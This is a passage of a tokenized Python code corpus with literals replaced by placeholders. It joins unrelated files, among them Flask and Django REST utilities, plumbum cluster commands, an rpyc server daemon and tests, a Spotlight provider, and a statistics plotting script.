MIXED_CHOICES [ <NUM_LIT:1> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> class RegexSerializer ( serializers . Serializer ) : <EOL> pin = serializers . CharField ( <EOL> validators = [ RegexValidator ( regex = re . compile ( '<STR_LIT>' ) , <EOL> message = '<STR_LIT>' ) ] ) <EOL> expected_repr = """<STR_LIT>""" . strip ( ) <EOL> class TestRegexSerializer ( TestCase ) : <EOL> def test_regex_repr ( self ) : <EOL> serializer_repr = repr ( RegexSerializer ( ) ) <EOL> assert serializer_repr == expected_repr </s>
<s> from __future__ import unicode_literals <EOL> from flask import request , Flask , Blueprint <EOL> from flask . _compat import reraise , string_types , text_type <EOL> from flask_api . exceptions import APIException <EOL> from flask_api . request import APIRequest <EOL> from flask_api . response import APIResponse <EOL> from flask_api . settings import APISettings <EOL> from itertools import chain <EOL> from werkzeug . exceptions import HTTPException <EOL> import re <EOL> import sys <EOL> api_resources = Blueprint ( <EOL> '<STR_LIT>' , __name__ , <EOL> url_prefix = '<STR_LIT>' , <EOL> template_folder = '<STR_LIT>' , static_folder = '<STR_LIT>' <EOL> ) <EOL> def urlize_quoted_links ( content ) : <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , content ) <EOL> class FlaskAPI ( Flask ) : <EOL> request_class = APIRequest <EOL> response_class = APIResponse <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FlaskAPI , self ) . __init__ ( * args , ** kwargs ) <EOL> self . api_settings = APISettings ( self . config ) <EOL> self . register_blueprint ( api_resources ) <EOL> self . jinja_env . filters [ '<STR_LIT>' ] = urlize_quoted_links <EOL> def preprocess_request ( self ) : <EOL> request . parser_classes = self . api_settings . DEFAULT_PARSERS <EOL> request . renderer_classes = self . api_settings . DEFAULT_RENDERERS <EOL> return super ( FlaskAPI , self ) . preprocess_request ( ) <EOL> def make_response ( self , rv ) : <EOL> """<STR_LIT>""" <EOL> status_or_headers = headers = None <EOL> if isinstance ( rv , tuple ) : <EOL> rv , status_or_headers , headers = rv + ( None , ) * ( <NUM_LIT:3> - len ( rv ) ) <EOL> if rv is None and status_or_headers : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if isinstance ( status_or_headers , ( dict , list ) ) : <EOL> headers , status_or_headers = status_or_headers , None <EOL> if not isinstance ( rv , self . 
response_class ) : <EOL> if isinstance ( rv , ( text_type , bytes , bytearray , list , dict ) ) : <EOL> rv = self . response_class ( rv , headers = headers , status = status_or_headers ) <EOL> headers = status_or_headers = None <EOL> else : <EOL> rv = self . response_class . force_type ( rv , request . environ ) <EOL> if status_or_headers is not None : <EOL> if isinstance ( status_or_headers , string_types ) : <EOL> rv . status = status_or_headers <EOL> else : <EOL> rv . status_code = status_or_headers <EOL> if headers : <EOL> rv . headers . extend ( headers ) <EOL> return rv <EOL> def handle_user_exception ( self , e ) : <EOL> """<STR_LIT>""" <EOL> exc_type , exc_value , tb = sys . exc_info ( ) <EOL> assert exc_value is e <EOL> if isinstance ( e , HTTPException ) and not self . trap_http_exception ( e ) : <EOL> return self . handle_http_exception ( e ) <EOL> if isinstance ( e , APIException ) : <EOL> return self . handle_api_exception ( e ) <EOL> blueprint_handlers = ( ) <EOL> handlers = self . error_handler_spec . get ( request . blueprint ) <EOL> if handlers is not None : <EOL> blueprint_handlers = handlers . get ( None , ( ) ) <EOL> app_handlers = self . error_handler_spec [ None ] . get ( None , ( ) ) <EOL> for typecheck , handler in chain ( blueprint_handlers , app_handlers ) : <EOL> if isinstance ( e , typecheck ) : <EOL> return handler ( e ) <EOL> reraise ( exc_type , exc_value , tb ) <EOL> def handle_api_exception ( self , exc ) : <EOL> return APIResponse ( { '<STR_LIT:message>' : exc . detail } , status = exc . status_code ) <EOL> def create_url_adapter ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request is not None : <EOL> environ = request . environ . copy ( ) <EOL> environ [ '<STR_LIT>' ] = request . method <EOL> return self . url_map . bind_to_environ ( environ , <EOL> server_name = self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] is not None : <EOL> return self . url_map . bind ( <EOL> self . 
config [ '<STR_LIT>' ] , <EOL> script_name = self . config [ '<STR_LIT>' ] or '<STR_LIT:/>' , <EOL> url_scheme = self . config [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> WARN_ONLY = True <EOL> message = """<STR_LIT>""" <EOL> class DeprecatedPropertyError ( Exception ) : <EOL> pass <EOL> class DeprecatedProperty ( object ) : <EOL> def __init__ ( self , instance , method ) : <EOL> self . instance = instance <EOL> self . method = method <EOL> def call ( self ) : <EOL> return self . method ( self . instance ) <EOL> def call_and_notify ( self ) : <EOL> method = self . method <EOL> method_name = method . __name__ <EOL> if WARN_ONLY : <EOL> warnings . warn ( message % method_name ) <EOL> return self . call ( ) <EOL> else : <EOL> raise DeprecatedPropertyError ( message % method_name ) <EOL> def __call__ ( self ) : <EOL> return self . call ( ) <EOL> def __nonzero__ ( self ) : <EOL> value = self . call_and_notify ( ) <EOL> return bool ( value ) <EOL> def __bool__ ( self ) : <EOL> return self . __nonzero__ ( ) <EOL> def __eq__ ( self , other ) : <EOL> value = self . call_and_notify ( ) <EOL> return value == other <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class DeprecatedPropertyDescriptor ( object ) : <EOL> def __init__ ( self , method ) : <EOL> self . method = method <EOL> def __get__ ( self , instance , owner ) : <EOL> return DeprecatedProperty ( instance , self . method ) <EOL> deprecated_property = DeprecatedPropertyDescriptor </s>
<s> from plumbum . commands . base import BaseCommand <EOL> from plumbum . commands . processes import run_proc , CommandNotFound , ProcessExecutionError <EOL> def make_concurrent ( self , rhs ) : <EOL> if not isinstance ( rhs , BaseCommand ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if isinstance ( self , ConcurrentCommand ) : <EOL> if isinstance ( rhs , ConcurrentCommand ) : <EOL> self . commands . extend ( rhs . commands ) <EOL> else : <EOL> self . commands . append ( rhs ) <EOL> return self <EOL> elif isinstance ( rhs , ConcurrentCommand ) : <EOL> rhs . commands . insert ( <NUM_LIT:0> , self ) <EOL> return rhs <EOL> else : <EOL> return ConcurrentCommand ( self , rhs ) <EOL> BaseCommand . __and__ = make_concurrent <EOL> class ConcurrentPopen ( object ) : <EOL> def __init__ ( self , procs ) : <EOL> self . procs = procs <EOL> self . stdin = None <EOL> self . stdout = None <EOL> self . stderr = None <EOL> self . encoding = None <EOL> self . returncode = None <EOL> @ property <EOL> def argv ( self ) : <EOL> return [ getattr ( proc , "<STR_LIT>" , [ ] ) for proc in self . procs ] <EOL> def poll ( self ) : <EOL> if self . returncode is not None : <EOL> return self . returncode <EOL> rcs = [ proc . poll ( ) for proc in self . procs ] <EOL> if any ( rc is None for rc in rcs ) : <EOL> return None <EOL> self . returncode = <NUM_LIT:0> <EOL> for rc in rcs : <EOL> if rc != <NUM_LIT:0> : <EOL> self . returncode = rc <EOL> break <EOL> return self . returncode <EOL> def wait ( self ) : <EOL> for proc in self . procs : <EOL> proc . wait ( ) <EOL> return self . poll ( ) <EOL> def communicate ( self , input = None ) : <EOL> if input : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> out_err_tuples = [ proc . communicate ( ) for proc in self . procs ] <EOL> self . wait ( ) <EOL> return tuple ( zip ( * out_err_tuples ) ) <EOL> class ConcurrentCommand ( BaseCommand ) : <EOL> def __init__ ( self , * commands ) : <EOL> self . 
commands = list ( commands ) <EOL> def formulate ( self , level = <NUM_LIT:0> , args = ( ) ) : <EOL> form = [ "<STR_LIT:(>" ] <EOL> for cmd in self . commands : <EOL> form . extend ( cmd . formulate ( level , args ) ) <EOL> form . append ( "<STR_LIT:&>" ) <EOL> return form + [ "<STR_LIT:)>" ] <EOL> def popen ( self , * args , ** kwargs ) : <EOL> return ConcurrentPopen ( [ cmd [ args ] . popen ( ** kwargs ) for cmd in self . commands ] ) <EOL> def __getitem__ ( self , args ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( args , ( tuple , list ) ) : <EOL> args = [ args , ] <EOL> if not args : <EOL> return self <EOL> else : <EOL> return ConcurrentCommand ( * ( cmd [ args ] for cmd in self . commands ) ) <EOL> class Cluster ( object ) : <EOL> def __init__ ( self , * machines ) : <EOL> self . machines = list ( machines ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , t , v , tb ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> for mach in self . machines : <EOL> mach . close ( ) <EOL> del self . machines [ : ] <EOL> def add_machine ( self , machine ) : <EOL> self . machines . append ( machine ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . machines ) <EOL> def filter ( self , pred ) : <EOL> return self . __class__ ( filter ( pred , self ) ) <EOL> def which ( self , progname ) : <EOL> return [ mach . which ( progname ) for mach in self ] <EOL> def list_processes ( self ) : <EOL> return [ mach . list_processes ( ) for mach in self ] <EOL> def pgrep ( self , pattern ) : <EOL> return [ mach . pgrep ( pattern ) for mach in self ] <EOL> def path ( self , * parts ) : <EOL> return [ mach . 
path ( * parts ) for mach in self ] <EOL> def __getitem__ ( self , progname ) : <EOL> if not isinstance ( progname , str ) : <EOL> raise TypeError ( "<STR_LIT>" % ( type ( progname , ) ) ) <EOL> return ConcurrentCommand ( * ( mach [ progname ] for mach in self ) ) <EOL> def __contains__ ( self , cmd ) : <EOL> try : <EOL> self [ cmd ] <EOL> except CommandNotFound : <EOL> return False <EOL> else : <EOL> return True <EOL> @ property <EOL> def python ( self ) : <EOL> return ConcurrentCommand ( * ( mach . python for mach in self ) ) <EOL> def session ( self ) : <EOL> return ClusterSession ( * ( mach . session ( ) for mach in self ) ) <EOL> class ClusterSession ( object ) : <EOL> def __init__ ( self , * sessions ) : <EOL> self . sessions = sessions <EOL> def __iter__ ( self ) : <EOL> return iter ( self . sessions ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , t , v , tb ) : <EOL> self . close ( ) <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . close ( ) <EOL> except Exception : <EOL> pass <EOL> def alive ( self ) : <EOL> """<STR_LIT>""" <EOL> return all ( session . alive for session in self ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> for session in self . sessions : <EOL> session . close ( ) <EOL> del self . sessions [ : ] <EOL> def popen ( self , cmd ) : <EOL> return ConcurrentPopen ( [ session . popen ( cmd ) for session in self ] ) <EOL> def run ( self , cmd , retcode = None ) : <EOL> return run_proc ( self . popen ( cmd ) , retcode ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from plumbum import local <EOL> from plumbum . cmd import ls , date , sleep <EOL> c = ls & date & sleep [ <NUM_LIT:1> ] <EOL> print ( c ( ) ) <EOL> c = ls & date & sleep [ <NUM_LIT:1> ] & sleep [ "<STR_LIT>" ] <EOL> try : <EOL> c ( ) <EOL> except ProcessExecutionError as ex : <EOL> print ( ex ) <EOL> else : <EOL> assert False <EOL> clst = Cluster ( local , local , local ) <EOL> print ( clst [ "<STR_LIT>" ] ( ) ) <EOL> print ( local . 
session ( ) . run ( "<STR_LIT>" ) ) <EOL> ret , stdout , stderr = clst . session ( ) . run ( "<STR_LIT>" ) <EOL> print ( ret ) <EOL> ret = [ int ( pid ) for pid in stdout ] <EOL> assert ( len ( set ( ret ) ) == <NUM_LIT:3> ) </s>
<s> from plumbum . commands . processes import CommandNotFound <EOL> from plumbum . commands . processes import ProcessExecutionError <EOL> from plumbum . commands . processes import ProcessTimedOut <EOL> class PopenAddons ( object ) : <EOL> """<STR_LIT>""" <EOL> def verify ( self , retcode , timeout , stdout , stderr ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( self , "<STR_LIT>" , False ) : <EOL> raise ProcessTimedOut ( "<STR_LIT>" % ( timeout , ) , <EOL> getattr ( self , "<STR_LIT>" , None ) ) <EOL> if retcode is not None : <EOL> if hasattr ( retcode , "<STR_LIT>" ) : <EOL> if self . returncode not in retcode : <EOL> raise ProcessExecutionError ( getattr ( self , "<STR_LIT>" , None ) , self . returncode , <EOL> stdout , stderr ) <EOL> elif self . returncode != retcode : <EOL> raise ProcessExecutionError ( getattr ( self , "<STR_LIT>" , None ) , self . returncode , <EOL> stdout , stderr ) <EOL> class BaseMachine ( object ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , cmd , * othercommands ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> command = self [ cmd ] <EOL> if not command . executable . exists ( ) : <EOL> raise CommandNotFound ( cmd , command . executable ) <EOL> else : <EOL> return command <EOL> except CommandNotFound : <EOL> if othercommands : <EOL> return self . get ( othercommands [ <NUM_LIT:0> ] , * othercommands [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> raise <EOL> def __contains__ ( self , cmd ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self [ cmd ] <EOL> except CommandNotFound : <EOL> return False <EOL> else : <EOL> return True <EOL> def daemonic_popen ( self , command , cwd = "<STR_LIT:/>" , stdout = None , stderr = None , append = True ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) </s>
<s> from __future__ import with_statement <EOL> import daemon <EOL> import lockfile <EOL> import sys <EOL> import signal <EOL> from rpyc . utils . server import ThreadedServer , ForkingServer <EOL> from rpyc . core . service import SlaveService <EOL> from rpyc . lib import setup_logger <EOL> try : <EOL> from configparser import ConfigParser <EOL> except ImportError : <EOL> from ConfigParser import ConfigParser <EOL> server = None <EOL> def start ( ) : <EOL> global server <EOL> conf = ConfigParser ( ) <EOL> conf . read ( '<STR_LIT>' ) <EOL> mode = conf . get ( "<STR_LIT>" , "<STR_LIT>" ) . lower ( ) <EOL> if mode == "<STR_LIT>" : <EOL> factory = ThreadedServer <EOL> elif mode == "<STR_LIT>" : <EOL> factory = ForkingServer <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( mode , ) ) <EOL> setup_logger ( conf . getboolean ( "<STR_LIT>" , "<STR_LIT>" ) , conf . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> server = factory ( SlaveService , hostname = conf . get ( "<STR_LIT>" , "<STR_LIT:host>" ) , <EOL> port = conf . getint ( "<STR_LIT>" , "<STR_LIT:port>" ) , reuse_addr = True ) <EOL> server . start ( ) <EOL> def reload ( * args ) : <EOL> server . close ( ) <EOL> start ( ) <EOL> def stop ( * args ) : <EOL> server . close ( ) <EOL> sys . exit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> with daemon . DaemonContext ( <EOL> pidfile = lockfile . FileLock ( '<STR_LIT>' ) , <EOL> signal_map = { signal . SIGTERM : stop , signal . SIGHUP : reload } ) : <EOL> start ( ) </s>
<s> """<STR_LIT>""" <EOL> from rpyc . core import ( SocketStream , TunneledSocketStream , PipeStream , Channel , <EOL> Connection , Service , BaseNetref , AsyncResult , GenericException , <EOL> AsyncResultTimeout , VoidService , SlaveService ) <EOL> from rpyc . utils . factory import ( connect_stream , connect_channel , connect_pipes , <EOL> connect_stdpipes , connect , ssl_connect , discover , connect_by_service , connect_subproc , <EOL> connect_thread , ssh_connect ) <EOL> from rpyc . utils . helpers import async , timed , buffiter , BgServingThread , restricted <EOL> from rpyc . utils import classic <EOL> from rpyc . version import version as __version__ <EOL> __author__ = "<STR_LIT>" </s>
<s> import rpyc <EOL> import unittest <EOL> class Properties ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _x = <NUM_LIT:0> <EOL> @ property <EOL> def counter ( self ) : <EOL> self . _x += <NUM_LIT:1> <EOL> return self . _x <EOL> @ property <EOL> def dont_touch_me ( self ) : <EOL> <NUM_LIT:1> / <NUM_LIT:0> <EOL> class TestAttributes ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . conn = rpyc . classic . connect_thread ( ) <EOL> def tearDown ( self ) : <EOL> self . conn . close ( ) <EOL> def test_properties ( self ) : <EOL> p = self . conn . modules [ "<STR_LIT>" ] . Properties ( ) <EOL> print ( p . counter ) <EOL> print ( p . counter ) <EOL> print ( p . counter ) <EOL> self . assertEqual ( p . counter , <NUM_LIT:4> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import with_statement <EOL> import unittest <EOL> from srcgen . python import PythonModule , R , E , CythonModule <EOL> class TestPython ( unittest . TestCase ) : <EOL> def test ( self ) : <EOL> m = PythonModule ( ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . sep ( ) <EOL> m . comment ( "<STR_LIT>" , box = True ) <EOL> m . stmt ( R ( x = <NUM_LIT> ) ) <EOL> with m . if_ ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . if_ ( E ( "<STR_LIT:z>" ) == <NUM_LIT> ) : <EOL> m . comment ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . if_ ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . sep ( ) <EOL> with m . def_ ( "<STR_LIT:foo>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . def_ ( "<STR_LIT:bar>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> def gen_class ( self , m , name , * args ) : <EOL> with m . class_ ( name ) : <EOL> with m . method ( "<STR_LIT>" , * args ) : <EOL> for a in args : <EOL> m . stmt ( "<STR_LIT>" , a ) <EOL> def test_methods ( self ) : <EOL> m = PythonModule ( ) <EOL> self . gen_class ( m , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" ) <EOL> self . gen_class ( m , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> def test_cython ( self ) : <EOL> m = CythonModule ( ) <EOL> with m . def_ ( "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . cdef ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . cdef . class_ ( "<STR_LIT>" ) : <EOL> with m . method ( "<STR_LIT>" , "<STR_LIT:x>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . 
cdef . extern ( "<STR_LIT>" ) : <EOL> with m . struct ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from Provider import * <EOL> from urllib import quote <EOL> from Utilities import * <EOL> import time <EOL> import Cache <EOL> class SpotlightAtom ( ProviderAtom ) : <EOL> def __init__ ( self , provider , url ) : <EOL> ProviderAtom . __init__ ( self , provider , url ) <EOL> clue = self . provider . clue <EOL> self . results = None <EOL> if clue . emails ( ) : <EOL> if url == '<STR_LIT>' : <EOL> predicate = "<STR_LIT>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % ( m , m ) for m in clue . emails ( ) ] ) + "<STR_LIT:)>" <EOL> else : <EOL> exclusions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> predicate = "<STR_LIT:(>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % e for e in exclusions ] ) + "<STR_LIT>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % m for m in clue . emails ( ) ] ) + '<STR_LIT:)>' <EOL> self . proxy = queryProxy . alloc ( ) . init ( ) <EOL> setattr ( self . proxy , '<STR_LIT>' , self ) <EOL> setattr ( self . proxy , '<STR_LIT>' , predicate ) <EOL> self . proxy . start ( ) <EOL> def sortOrder ( self ) : <EOL> return MAX_SORT_ORDER - <NUM_LIT:1> <EOL> def body ( self ) : <EOL> if not self . results : return None <EOL> body = [ ] <EOL> for r in self . results [ : <NUM_LIT:10> ] : <EOL> body . append ( '<STR_LIT>' % ( r . valueForAttribute_ ( '<STR_LIT>' ) , r . valueForAttribute_ ( '<STR_LIT>' ) ) ) <EOL> return '<STR_LIT>' . join ( body ) <EOL> class queryProxy ( NSObject ) : <EOL> def init ( self ) : <EOL> self = super ( queryProxy , self ) . init ( ) <EOL> if not self : return <EOL> self . atom = None <EOL> self . predicate = None <EOL> return self <EOL> def start ( self ) : <EOL> self . query = NSMetadataQuery . alloc ( ) . init ( ) <EOL> self . query . setPredicate_ ( NSPredicate . predicateWithFormat_ ( self . predicate ) ) <EOL> self . query . setSortDescriptors_ ( NSArray . arrayWithObject_ ( NSSortDescriptor . alloc ( ) . initWithKey_ascending_ ( '<STR_LIT>' , False ) ) ) <EOL> NSNotificationCenter . defaultCenter ( ) . 
addObserver_selector_name_object_ ( self , self . gotSpotlightData_ , NSMetadataQueryDidFinishGatheringNotification , self . query ) <EOL> self . query . startQuery ( ) <EOL> def gotSpotlightData_ ( self , notification ) : <EOL> query = notification . object ( ) <EOL> print "<STR_LIT>" % ( len ( query . results ( ) ) , self . predicate ) <EOL> self . atom . results = query . results ( ) <EOL> self . atom . changed ( ) <EOL> class SpotlightProvider ( Provider ) : <EOL> def atomClass ( self ) : <EOL> return SpotlightAtom <EOL> def provide ( self ) : <EOL> self . atoms = [ SpotlightAtom ( self , "<STR_LIT>" ) , SpotlightAtom ( self , "<STR_LIT>" ) ] </s>
<s> import json <EOL> from datetime import datetime , time , timedelta <EOL> from scipy import stats <EOL> from numpy import mean , std , sqrt <EOL> import matplotlib . pyplot as plt <EOL> fh = open ( '<STR_LIT>' ) <EOL> data = json . load ( fh ) <EOL> big = { k : data [ k ] for k in data if len ( data [ k ] ) > <NUM_LIT> } <EOL> spread = { } <EOL> sleepers = { } <EOL> wakers = { } <EOL> for key in big : <EOL> first = [ ] <EOL> last = [ ] <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> first = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> first = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> continue <EOL> continue <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> last = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> last = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> continue <EOL> continue <EOL> if first and last : <EOL> spread [ key ] = last - first <EOL> if first . day == last . 
day : <EOL> wakers [ key ] = big [ key ] <EOL> else : <EOL> sleepers [ key ] = big [ key ] <EOL> attempts = { '<STR_LIT>' % ( i + <NUM_LIT:1> ) : [ ] for i in range ( <NUM_LIT:10> , <NUM_LIT:15> ) } <EOL> endmax = { } <EOL> for key in big : <EOL> try : <EOL> endmax [ key ] = max ( [ big [ key ] [ attempt ] [ <NUM_LIT:0> ] for attempt in attempts ] ) <EOL> except KeyError : <EOL> continue <EOL> rec = [ ] <EOL> for key in spread : <EOL> try : <EOL> rec . append ( [ spread [ key ] , endmax [ key ] ] ) <EOL> except KeyError : <EOL> continue <EOL> p = [ ] <EOL> diff = [ ] <EOL> mean_rester = [ ] <EOL> mean_goer = [ ] <EOL> for h in range ( <NUM_LIT> , <NUM_LIT> ) : <EOL> goers = [ ] <EOL> resters = [ ] <EOL> for key in big : <EOL> try : <EOL> if spread [ key ] > timedelta ( hours = h ) : <EOL> resters . append ( endmax [ key ] ) <EOL> else : <EOL> goers . append ( endmax [ key ] ) <EOL> except KeyError : <EOL> continue <EOL> print '<STR_LIT>' % h <EOL> print '<STR_LIT>' % stats . ttest_ind ( resters , goers ) <EOL> print "<STR_LIT>" % ( len ( resters ) + len ( goers ) - <NUM_LIT:2> ) <EOL> t , prob = stats . ttest_ind ( resters , goers ) <EOL> poolstd = sqrt ( <NUM_LIT:0.5> * ( std ( resters ) ** <NUM_LIT:2> + std ( goers ) ** <NUM_LIT:2> ) ) <EOL> effect_size = ( mean ( resters ) - mean ( goers ) ) / poolstd <EOL> print "<STR_LIT>" % effect_size <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> ax . errorbar ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ mean ( goers ) , mean ( resters ) ] , yerr = [ std ( goers ) / sqrt ( len ( goers ) ) , std ( resters ) / sqrt ( len ( resters ) ) ] , marker = '<STR_LIT:o>' ) <EOL> ax . set_xticks ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> plt . xlim ( <NUM_LIT> , <NUM_LIT> ) <EOL> plt . ylim ( <NUM_LIT> , <NUM_LIT> ) <EOL> group_labels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ax . set_xticklabels ( group_labels ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . 
xlabel ( '<STR_LIT>' ) <EOL> plt . savefig ( '<STR_LIT>' , dpi = None , facecolor = '<STR_LIT:w>' , edgecolor = '<STR_LIT:w>' , <EOL> orientation = '<STR_LIT>' , papertype = None , format = None , <EOL> transparent = False , bbox_inches = None , pad_inches = <NUM_LIT:0.1> ) <EOL> generatepaperfigs = <NUM_LIT:1> <EOL> if generatepaperfigs : <EOL> plt . savefig ( '<STR_LIT>' , dpi = <NUM_LIT> , facecolor = '<STR_LIT:w>' , edgecolor = '<STR_LIT:w>' , <EOL> orientation = '<STR_LIT>' , papertype = None , format = None , <EOL> transparent = False , bbox_inches = '<STR_LIT>' , pad_inches = <NUM_LIT:0.1> ) <EOL> import pickle <EOL> pickle . dump ( p , open ( '<STR_LIT>' , '<STR_LIT:wb>' ) ) <EOL> pickle . dump ( diff , open ( '<STR_LIT>' , '<STR_LIT:wb>' ) ) </s>
<s> from django . apps import apps <EOL> from django . db import connection <EOL> from django . test import TransactionTestCase <EOL> from django . test . utils import override_settings <EOL> from django_tenants . utils import get_public_schema_name <EOL> class TestSettings ( TransactionTestCase ) : <EOL> @ override_settings ( PG_EXTRA_SEARCH_PATHS = [ '<STR_LIT>' ] ) <EOL> def test_PG_EXTRA_SEARCH_PATHS ( self ) : <EOL> del apps . all_models [ '<STR_LIT>' ] <EOL> c = connection . cursor ( ) <EOL> c . execute ( '<STR_LIT>' . format ( <EOL> get_public_schema_name ( ) <EOL> ) ) <EOL> apps . set_installed_apps ( [ '<STR_LIT>' , '<STR_LIT>' ] ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> from django . utils . translation import ugettext as _ <EOL> from django . db import models <EOL> from quiz . models import Question <EOL> ANSWER_ORDER_OPTIONS = ( <EOL> ( '<STR_LIT:content>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:none>' , _ ( '<STR_LIT:None>' ) ) <EOL> ) <EOL> class MCQuestion ( Question ) : <EOL> answer_order = models . CharField ( <EOL> max_length = <NUM_LIT:30> , null = True , blank = True , <EOL> choices = ANSWER_ORDER_OPTIONS , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> def check_if_correct ( self , guess ) : <EOL> answer = Answer . objects . get ( id = guess ) <EOL> if answer . correct is True : <EOL> return True <EOL> else : <EOL> return False <EOL> def order_answers ( self , queryset ) : <EOL> if self . answer_order == '<STR_LIT:content>' : <EOL> return queryset . order_by ( '<STR_LIT:content>' ) <EOL> if self . answer_order == '<STR_LIT>' : <EOL> return queryset . order_by ( '<STR_LIT:?>' ) <EOL> if self . answer_order == '<STR_LIT:none>' : <EOL> return queryset . order_by ( ) <EOL> return queryset <EOL> def get_answers ( self ) : <EOL> return self . order_answers ( Answer . objects . filter ( question = self ) ) <EOL> def get_answers_list ( self ) : <EOL> return [ ( answer . id , answer . content ) for answer in <EOL> self . order_answers ( Answer . objects . filter ( question = self ) ) ] <EOL> def answer_choice_to_string ( self , guess ) : <EOL> return Answer . objects . get ( id = guess ) . content <EOL> class Meta : <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> @ python_2_unicode_compatible <EOL> class Answer ( models . Model ) : <EOL> question = models . ForeignKey ( MCQuestion , verbose_name = _ ( "<STR_LIT>" ) ) <EOL> content = models . 
